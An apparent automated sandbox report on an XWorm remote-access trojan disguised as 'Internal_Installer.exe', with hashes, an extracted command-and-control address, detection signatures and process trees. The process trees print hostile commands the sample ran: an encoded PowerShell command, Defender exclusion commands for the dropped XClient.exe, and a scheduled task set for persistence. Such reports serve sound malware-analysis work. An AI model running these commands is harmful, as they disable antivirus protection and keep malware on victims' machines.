Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20231215-en -
resource tags
arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system -
submitted
04-02-2024 00:59
Static task
static1
Behavioral task
behavioral1
Sample
Internal_Installer.exe
Resource
win11-20231215-en
General
-
Target
Internal_Installer.exe
-
Size
140.7MB
-
MD5
c2e31745e3839161e7dbd874062f2946
-
SHA1
bd9d04177a5f5a906d7b73ecf271011178064708
-
SHA256
30b429740ae782ad1ce0b0d9e569ab42ce1c9a43e358c490c6e539ca7bdbb40d
-
SHA512
8e0909fb6c0cae985e35475c86d0d0209bbfce8e41350e40d305128acd5aef52fb5ab0c756bf5bbf370597dadfcfd8754a7210ec907bfd22cffa8dfe7d1050c9
-
SSDEEP
1572864:V4GRQtQzKNAwsDi3fRusajRHgsP6pVm1Etb5/xISipohDtrbw6koLAYE3SWAPKos:+GaCK2wlZajCSvp0+AioCKs
Malware Config
Extracted
xworm
3.125.102.39:18996
-
Install_directory
%AppData%
-
install_file
XClient.exe
Signatures
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/files/0x000900000002a77d-4.dat family_xworm behavioral1/memory/4264-11-0x00000000008D0000-0x00000000008EC000-memory.dmp family_xworm behavioral1/memory/5012-240-0x00000222DA010000-0x00000222DA020000-memory.dmp family_xworm -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe -
Executes dropped EXE 5 IoCs
pid Process 4264 XClient.exe 716 InternalWinFormsClean.exe 3456 XClient.exe 3464 XClient.exe 2272 XClient.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1155165157-2721788668-771323609-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" XClient.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 discord.com 3 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3932 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4264 XClient.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3120 powershell.exe 3120 powershell.exe 1988 powershell.exe 1988 powershell.exe 4664 powershell.exe 4664 powershell.exe 5012 powershell.exe 5012 powershell.exe 1116 powershell.exe 1116 powershell.exe 4264 XClient.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 4264 XClient.exe Token: SeDebugPrivilege 3120 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 4664 powershell.exe Token: SeDebugPrivilege 5012 powershell.exe Token: SeDebugPrivilege 1116 powershell.exe Token: SeDebugPrivilege 4264 XClient.exe Token: SeDebugPrivilege 3456 XClient.exe Token: SeDebugPrivilege 3464 XClient.exe Token: SeDebugPrivilege 2272 XClient.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4264 XClient.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 832 wrote to memory of 3120 832 Internal_Installer.exe 77 PID 832 wrote to memory of 3120 832 Internal_Installer.exe 77 PID 832 wrote to memory of 3120 832 Internal_Installer.exe 77 PID 832 wrote to memory of 4264 832 Internal_Installer.exe 79 PID 832 wrote to memory of 4264 832 Internal_Installer.exe 79 PID 832 wrote to memory of 716 832 Internal_Installer.exe 80 PID 832 wrote to memory of 716 832 Internal_Installer.exe 80 PID 4264 wrote to memory of 1988 4264 XClient.exe 83 PID 4264 wrote to memory of 1988 4264 XClient.exe 83 PID 4264 wrote to memory of 4664 4264 XClient.exe 85 PID 4264 wrote to memory of 4664 4264 XClient.exe 85 PID 4264 wrote to memory of 5012 4264 XClient.exe 87 PID 4264 wrote to memory of 5012 4264 XClient.exe 87 PID 4264 wrote to memory of 1116 4264 XClient.exe 89 PID 4264 wrote to memory of 1116 4264 XClient.exe 89 PID 4264 wrote to memory of 3932 4264 XClient.exe 91 PID 4264 wrote to memory of 3932 4264 XClient.exe 91 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Internal_Installer.exe"C:\Users\Admin\AppData\Local\Temp\Internal_Installer.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdwBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcABoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAYgBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAbgBnACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"3⤵
- Creates scheduled task(s)
PID:3932
-
-
-
C:\Users\Admin\AppData\Local\Temp\InternalWinFormsClean.exe"C:\Users\Admin\AppData\Local\Temp\InternalWinFormsClean.exe"2⤵
- Executes dropped EXE
PID:716
-
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3456
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2272
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52cbbb74b7da1f720b48ed31085cbd5b8
SHA179caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
944B
MD5e8a7ab7bae6a69946da69507ee7ae7b0
SHA1b367c72fa4948493819e1c32c32239aa6e78c252
SHA256cd5480d72c1a359e83f7d6b6d7d21e1be2463f2c6718385cc6c393c88323b272
SHA51289b22519bc3986be52801397e6eff4550621b4804abd2d04f431c9b2591ba8e3eab2625490a56ebb947ba3b122b6186badb6c461e917b69d7e13644c86a6f683
-
Filesize
944B
MD5781da0576417bf414dc558e5a315e2be
SHA1215451c1e370be595f1c389f587efeaa93108b4c
SHA25641a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe
SHA51224e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737
-
Filesize
229KB
MD53d8d433ca3f1ff4a271a32a441b3953f
SHA1117b5622faf7e35cfdc6120715112b4d0253eb0e
SHA2562018491817e46bceec386d2bfc4b8b880aa3f5c418b6161fc95272d13fde015f
SHA512a0f463b293654f7344f141fef8f713595c16331c0701bbc4e328430768fc84822f0d48e9883ae6a9a78e337dd8ed37dcadf99c777e344cbc19d3c7ddc55d7aee
-
Filesize
155KB
MD5a1d1a9f21e1e39eb18e808a26b4623cd
SHA15cfa40bc493d3e59e0bb3f96114bb13d43758997
SHA2564940629767960f918a966876b5d5d48df4c006decece91d2777e0aad45761cb6
SHA51239dd2d928264049fdddd3f71ae1e11c8006ccdbc251916a1ed5c161185dc4d828e7539aec8b1e40d53b970a0853bd1bd216b7c3d7eb74d3a3b4d03529dbd2014
-
Filesize
187KB
MD543445299f3fdb13b56fa9d85928d4465
SHA11106ec24a7e1f5af5ed342736a21de0bb984cdb3
SHA2565a0f77b1efd12baf3e6fcdc2e4d67373b065a1378cb9a0c2363eed49ab7a43d4
SHA5122db0662d5c7c67956e237112fc9bdf909677e49109a4cbfc6254fdcce9f0c3421b573df88abe2c7a614f89dbcce93386332ec8b30d6b25576304f98da9ad4893
-
Filesize
83KB
MD5261867654adadcc7bd1c32300306e7d5
SHA14b338d8e329fa1c12c2d7170f416baa5ec6ea48c
SHA256fa84acb32cfaec588702da9d68b4013dba21befed9e363f7429b88f7e6261dd8
SHA512e79e8e29aad782da28d3b9b54eee0471bb13512fb76151fdfd65b83dd002f6d724582b9ba4e5527002e4ae51dc4b5a70fe5dd8a89eecc3c635eb26e9cfab42ba
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82